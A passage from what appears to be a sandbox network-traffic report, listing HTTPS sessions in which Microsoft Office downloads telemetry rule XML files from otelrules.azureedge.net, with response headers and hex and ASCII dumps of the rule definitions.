                  2024-10-23 04:48:18 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                  Session IDSource IPSource PortDestination IPDestination Port
                  98192.168.2.44984713.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:19 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:19 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:19 GMT
                  Content-Type: text/xml
                  Content-Length: 1352
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                  ETag: "0x8DC582BE9DEEE28"
                  x-ms-request-id: 18e0c3bd-301e-001f-11f3-24aa3a000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044819Z-r197bdfb6b429k2s6br3k49qn400000002sg00000000m8m7
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:19 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                  Session IDSource IPSource PortDestination IPDestination Port
                  99192.168.2.44984613.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:19 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:19 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:19 GMT
                  Content-Type: text/xml
                  Content-Length: 1389
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                  ETag: "0x8DC582BE10A6BC1"
                  x-ms-request-id: 082c7638-801e-0067-65f2-24fe30000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044819Z-15b8d89586fdmfsg1u7xrpfws0000000015g00000000p801
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:19 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                  Session IDSource IPSource PortDestination IPDestination Port
                  100192.168.2.44984813.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:19 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:19 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:19 GMT
                  Content-Type: text/xml
                  Content-Length: 1405
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                  ETag: "0x8DC582BE12B5C71"
                  x-ms-request-id: 7898325b-901e-00ac-11c9-20b69e000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044819Z-16849878b7842t5ke0k7mzbt3c00000005dg00000000tfhq
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:19 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                  Session IDSource IPSource PortDestination IPDestination Port
                  101192.168.2.44984913.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:19 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:19 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:19 GMT
                  Content-Type: text/xml
                  Content-Length: 1368
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                  ETag: "0x8DC582BDDC22447"
                  x-ms-request-id: 04521c86-e01e-0003-3ff4-240fa8000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044819Z-15b8d89586f42m673h1quuee4s000000013000000000af12
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:19 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                  Session IDSource IPSource PortDestination IPDestination Port
                  102192.168.2.44985013.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:19 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:19 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:19 GMT
                  Content-Type: text/xml
                  Content-Length: 1401
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                  ETag: "0x8DC582BE055B528"
                  x-ms-request-id: 816a6405-301e-001f-06d8-21aa3a000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044819Z-16849878b7842t5ke0k7mzbt3c00000005g000000000gg9q
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:19 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                  Session IDSource IPSource PortDestination IPDestination Port
                  103192.168.2.44985113.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:20 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:20 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:20 GMT
                  Content-Type: text/xml
                  Content-Length: 1364
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                  ETag: "0x8DC582BE1223606"
                  x-ms-request-id: 31e4fe8c-301e-0033-38f2-21fa9c000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044820Z-16849878b78dkr6tqerbnpg1zc00000005n000000000q3yk
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:20 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                  Session IDSource IPSource PortDestination IPDestination Port
                  104192.168.2.44985213.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:20 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:20 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:20 GMT
                  Content-Type: text/xml
                  Content-Length: 1397
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                  ETag: "0x8DC582BE7262739"
                  x-ms-request-id: 9658afd7-401e-008c-2df3-2486c2000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044820Z-r197bdfb6b4rt57kw3q0f43mqg00000009v000000000rppe
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:20 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                  Session IDSource IPSource PortDestination IPDestination Port
                  105192.168.2.44985313.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:20 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:20 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:20 GMT
                  Content-Type: text/xml
                  Content-Length: 1360
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                  ETag: "0x8DC582BDDEB5124"
                  x-ms-request-id: e092e42d-501e-0035-603a-22c923000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044820Z-16849878b78plcdqu15wsb886400000005r0000000005hca
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:20 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                  Session IDSource IPSource PortDestination IPDestination Port
                  106192.168.2.44985413.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:20 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:20 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:20 GMT
                  Content-Type: text/xml
                  Content-Length: 1403
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                  ETag: "0x8DC582BDCB4853F"
                  x-ms-request-id: cbb0b495-901e-005b-56e4-212005000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044820Z-16849878b78dkr6tqerbnpg1zc00000005p000000000nh05
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:20 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                  Session IDSource IPSource PortDestination IPDestination Port
                  107192.168.2.44985513.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:20 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:20 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:20 GMT
                  Content-Type: text/xml
                  Content-Length: 1366
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                  ETag: "0x8DC582BDB779FC3"
                  x-ms-request-id: 9aa7f8dd-901e-0048-781b-24b800000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044820Z-r197bdfb6b4r9fwfyb63s04k3n00000006tg0000000028ht
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:20 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                  Session IDSource IPSource PortDestination IPDestination Port
                  108192.168.2.44985613.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:20 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:21 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:21 GMT
                  Content-Type: text/xml
                  Content-Length: 1397
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                  ETag: "0x8DC582BDFD43C07"
                  x-ms-request-id: 106adab5-b01e-0001-11da-2046e2000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044821Z-16849878b786wvrz321uz1cknn00000005pg00000000h8ts
                  x-fd-int-roxy-purgeid: 0
